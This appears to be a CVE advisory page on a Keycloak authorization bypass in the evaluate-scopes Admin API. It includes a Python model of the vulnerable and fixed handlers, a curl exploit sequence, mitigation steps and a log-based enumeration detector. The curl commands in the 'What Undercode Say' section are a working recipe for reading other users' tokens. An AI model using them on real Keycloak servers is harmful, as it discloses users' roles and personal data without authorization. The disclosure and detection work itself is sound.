Keycloak: Information Disclosure via evaluate-scopes Admin API (CVE-2026-37978) (Moderate) -DC-Jun2026-158


A vulnerability identified as CVE-2026-37978 has been discovered in Keycloak, an open-source identity and access management solution. The flaw resides in the Admin API endpoints that evaluate a client's scopes for a given user. An administrator holding only the 'view-clients' role can call the 'evaluate-scopes' endpoints with an arbitrary user ID in the 'userId' parameter and receive the result for that user. This is an authorization bypass of the kind classified as CWE-639: Authorization Bypass Through User-Controlled Key.
The core issue is a missing authorization check, not a missing input check: the supplied 'userId' is a perfectly valid identifier, but when the server processes an evaluate-scopes request it never verifies that the requesting administrator is permitted to view the user that identifier names. The vulnerable flow resolves the target user and proceeds to generate an example token or user data for them without enforcing a user access check, so any caller with client-scope evaluation access can act on users they are not authorized to inspect.
This vulnerability is particularly concerning because it operates through a legitimate administrative API pathway: the abusive calls look like ordinary admin traffic, which makes them harder to spot. It is exploitable remotely over the network by any authenticated administrator holding the role; no physical access or local system compromise is needed. An attacker can use it to enumerate user identities, map which roles and scopes individual users hold, and identify high-value targets, undermining the principle of least privilege and the realm's role-based access control.
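The pattern described above, as an added example that is not Keycloak's own (Java) code: a simplified Python model of a client-scope evaluation resource, with the vulnerable flow beside the fixed one. The realm data, the role names the evaluator checks, the `generate_example_access_token_*` and `http_status` helpers, and the claim layout of the example token are all assumptions made for the illustration. In particular, the model checks the resolved user only after the existence check, so the status codes it returns for an unknown user are the model's own, not a statement about Keycloak's responses.

```python
from dataclasses import dataclass


class Forbidden(Exception):
    """Stands in for the 403 the real endpoint would return."""


class NotFound(Exception):
    """Stands in for the 404 the real endpoint would return."""


@dataclass(frozen=True)
class User:
    id: str
    username: str
    realm_roles: frozenset


@dataclass(frozen=True)
class Client:
    id: str          # internal UUID used in the Admin API path
    client_id: str   # public client identifier
    scopes: frozenset


@dataclass(frozen=True)
class Admin:
    username: str
    admin_roles: frozenset   # realm-management roles held by the caller


# Constructed sample realm for the example (not real data).
USERS = {
    "u-1001": User("u-1001", "alice", frozenset({"offline_access", "finance-approver"})),
    "u-1002": User("u-1002", "bob", frozenset({"offline_access"})),
}
CLIENTS = {
    "c-0001": Client("c-0001", "account", frozenset({"openid", "profile", "email"})),
}


class AdminPermissionEvaluator:
    """Models the two checks involved: one on the client, one on the user (assumed role names)."""

    def __init__(self, admin: Admin):
        self.roles = admin.admin_roles

    def require_view_client(self, client: Client) -> None:
        if not self.roles & {"view-clients", "manage-clients", "realm-admin"}:
            raise Forbidden(f"no view permission on client {client.client_id}")

    def require_view_user(self, user: User) -> None:
        if not self.roles & {"view-users", "manage-users", "realm-admin"}:
            raise Forbidden(f"no view permission on user {user.username}")


def _example_token(client: Client, user: User, scope: str) -> dict:
    """Build the example token claims; the layout is an assumption of this model."""
    requested = set(scope.split()) & client.scopes
    return {
        "sub": user.id,
        "preferred_username": user.username,
        "azp": client.client_id,
        "scope": " ".join(sorted(requested)),
        "realm_access": {"roles": sorted(user.realm_roles)},
    }


def generate_example_access_token_vulnerable(admin, client_uuid, user_id, scope="openid"):
    auth = AdminPermissionEvaluator(admin)
    client = CLIENTS.get(client_uuid)
    if client is None:
        raise NotFound("client")
    auth.require_view_client(client)            # the only authorization check that runs
    user = USERS.get(user_id)                   # attacker-controlled key ...
    if user is None:
        raise NotFound("user")
    return _example_token(client, user, scope)  # ... used with no per-user check (CWE-639)


def generate_example_access_token_fixed(admin, client_uuid, user_id, scope="openid"):
    auth = AdminPermissionEvaluator(admin)
    client = CLIENTS.get(client_uuid)
    if client is None:
        raise NotFound("client")
    auth.require_view_client(client)
    user = USERS.get(user_id)
    if user is None:
        raise NotFound("user")
    auth.require_view_user(user)                # added: authorize the caller for the resolved user
    return _example_token(client, user, scope)


def http_status(handler, admin, client_uuid, user_id, scope="openid") -> int:
    """Map a handler's outcome to the HTTP status the modelled endpoint would return."""
    try:
        handler(admin, client_uuid, user_id, scope)
        return 200
    except Forbidden:
        return 403
    except NotFound:
        return 404
```

With an admin that holds only `view-clients`, the vulnerable handler returns alice's roles and scopes, while the fixed handler refuses at the user check; the client check alone is what the caller's role actually covers.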

DailyCVE Form

Platform: Keycloak
Version: Affected versions (fixed in 26.6.2; see Protection)
Vulnerability: Information Disclosure
Severity: Moderate
Date: 2026-05-19

Prediction: 2026-05-20

What Undercode Say

# Keycloak base URL (Keycloak 26 serves at the root; older deployments add /auth)
BASE_URL="https://keycloak.example.com"
REALM="master"
ADMIN_URL="$BASE_URL/admin/realms/$REALM"
# Authenticate as a low-privilege admin holding only the 'view-clients' role.
# The token endpoint lives under /realms/<realm>, not under /admin/realms.
ADMIN_TOKEN=$(curl -s -X POST "$BASE_URL/realms/$REALM/protocol/openid-connect/token" \
-d "client_id=admin-cli" \
-d "username=lowpriv-admin" \
-d "password=password" \
-d "grant_type=password" | jq -r '.access_token')
# evaluate-scopes hangs off a client addressed by its internal UUID; looking it up needs only view-clients
CLIENT_UUID=$(curl -s "$ADMIN_URL/clients?clientId=account" \
-H "Authorization: Bearer $ADMIN_TOKEN" | jq -r '.[0].id')
# Exploit: the 'userId' query parameter is attacker-controlled and, on affected versions, no check
# on the target user is applied. Set TARGET_USER_ID to any user ID in the realm.
curl -s "$ADMIN_URL/clients/$CLIENT_UUID/evaluate-scopes/generate-example-access-token?scope=openid&userId=$TARGET_USER_ID" \
-H "Authorization: Bearer $ADMIN_TOKEN"

Exploit

An attacker holding the `view-clients` role exploits this by sending GET requests to the `evaluate-scopes` endpoints of any client they can view (for example `generate-example-access-token` or `generate-example-userinfo`), supplying any valid user ID of the realm in the `userId` query parameter. On affected versions the server returns the example token or userinfo document for that user, disclosing the user's identity, effective scopes, roles, and whatever other claims (including PII) the client's mappers emit.

Protection

1. Upgrade to version 26.6.2 or higher.

  1. If upgrading is not immediately possible, restrict who holds the `view-clients` role (and the `manage-clients`, `realm-admin` and master-realm `admin` roles that include it) to trusted administrators. Keycloak grants access to the `evaluate-scopes` endpoints through these roles, not per endpoint, so there is no configuration switch that closes the endpoint on its own. Where a reverse proxy fronts Keycloak, it can additionally block or log requests to the `/admin/realms/*/clients/*/evaluate-scopes/*` paths.
  2. Because the root cause is a missing per-user authorization check inside Keycloak (CWE-639) rather than an operator-side configuration error, treat the role restriction above as a stopgap and prioritize the upgrade. After upgrading, confirm that a `view-clients`-only administrator is denied, rather than served data, when calling the `evaluate-scopes` endpoints with the ID of a user they cannot view.
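Because the abusive calls are ordinary GETs against a legitimate admin path, and Keycloak's admin events record only create, update, delete and action operations rather than reads, the practical detection source is the reverse-proxy access log. The following is an added example, not part of the original page or of Keycloak: it parses constructed nginx combined-format lines, extracts each evaluate-scopes call together with its attacker-controlled `userId`, and flags source addresses that successfully evaluated scopes for several distinct users, which is the enumeration pattern described under Impact. The log lines, addresses, client UUID, user IDs and the threshold of three are all constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in nginx "combined" format from a proxy in front of
# Keycloak (not real traffic). 10.0.0.5 walks several userIds, one of which does
# not exist; 10.0.0.9 makes one ordinary call, on an older /auth-prefixed path,
# plus two requests that carry no userId at all.
SAMPLE_LOG = """\
10.0.0.5 - - [19/May/2026:10:01:02 +0000] "GET /admin/realms/master/clients/6d0f3e2a-0000-4000-8000-000000000001/evaluate-scopes/generate-example-access-token?scope=openid&userId=u-1001 HTTP/1.1" 200 812 "-" "curl/8.5.0"
10.0.0.5 - - [19/May/2026:10:01:03 +0000] "GET /admin/realms/master/clients/6d0f3e2a-0000-4000-8000-000000000001/evaluate-scopes/generate-example-access-token?scope=openid&userId=u-1002 HTTP/1.1" 200 790 "-" "curl/8.5.0"
10.0.0.5 - - [19/May/2026:10:01:04 +0000] "GET /admin/realms/master/clients/6d0f3e2a-0000-4000-8000-000000000001/evaluate-scopes/generate-example-userinfo?scope=openid&userId=u-1003 HTTP/1.1" 200 411 "-" "curl/8.5.0"
10.0.0.5 - - [19/May/2026:10:01:05 +0000] "GET /admin/realms/master/clients/6d0f3e2a-0000-4000-8000-000000000001/evaluate-scopes/generate-example-access-token?scope=openid&userId=u-9999 HTTP/1.1" 404 64 "-" "curl/8.5.0"
10.0.0.9 - - [19/May/2026:10:05:00 +0000] "GET /auth/admin/realms/master/clients/6d0f3e2a-0000-4000-8000-000000000001/evaluate-scopes/generate-example-access-token?scope=openid&userId=u-2001 HTTP/1.1" 200 802 "-" "Mozilla/5.0"
10.0.0.9 - - [19/May/2026:10:05:01 +0000] "GET /admin/realms/master/clients/6d0f3e2a-0000-4000-8000-000000000001/evaluate-scopes/protocol-mappers?scope=openid HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
10.0.0.9 - - [19/May/2026:10:05:02 +0000] "GET /admin/realms/master/users?first=0&max=20 HTTP/1.1" 403 0 "-" "Mozilla/5.0"
"""

# One nginx "combined" line: client address, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Admin API path of the client-scope evaluation endpoints. Older deployments
# serve Keycloak under /auth, so that prefix is accepted as optional.
PATH_RE = re.compile(
    r'^/(?:auth/)?admin/realms/(?P<realm>[^/]+)/clients/(?P<client>[^/]+)'
    r'/evaluate-scopes/(?P<op>[^/]+)$'
)


def parse_evaluate_scopes_calls(log_text):
    """Return one dict per access-log line that hits an evaluate-scopes path."""
    calls = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        pm = PATH_RE.match(url.path)
        if not pm:
            continue
        query = parse_qs(url.query)
        calls.append({
            "ip": m["ip"],
            "ts": m["ts"],
            "realm": pm["realm"],
            "client": pm["client"],
            "op": pm["op"],
            # userId is the attacker-controlled key; sub-paths that take no
            # user (e.g. protocol-mappers) simply have none
            "user_id": query.get("userId", [None])[0],
            "status": int(m["status"]),
        })
    return calls


def flag_enumeration(calls, threshold=3):
    """Sources that successfully evaluated scopes for at least `threshold` distinct users."""
    per_ip = defaultdict(set)
    for c in calls:
        if c["user_id"] and c["status"] == 200:   # 404s reveal existence but no data
            per_ip[c["ip"]].add(c["user_id"])
    return {ip: sorted(ids) for ip, ids in per_ip.items() if len(ids) >= threshold}


if __name__ == "__main__":
    for ip, ids in flag_enumeration(parse_evaluate_scopes_calls(SAMPLE_LOG)).items():
        print(f"{ip}: evaluated scopes for {len(ids)} distinct users: {', '.join(ids)}")
```

Run against the sample, the script flags 10.0.0.5 for three distinct users and ignores 10.0.0.9. The threshold is a tuning knob: a single administrator legitimately checking one user's effective scopes is normal, a source walking many user IDs in quick succession is the signature of this flaw being used for enumeration. A proxy that strips query strings from its access log will hide the `userId` values, so check the log format before relying on this.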

Impact

Successful exploitation gives a low-privilege administrator visibility into any user's identity, effective scopes, and role assignments across the entire realm, without the user-level view permission that this information normally requires. This can lead to compliance violations (e.g., GDPR, CCPA), exposure of sensitive organizational data, and staging for privilege escalation: the attacker learns exactly which accounts hold the permissions worth targeting next.


Sources:

Reported By: nvd.nist.gov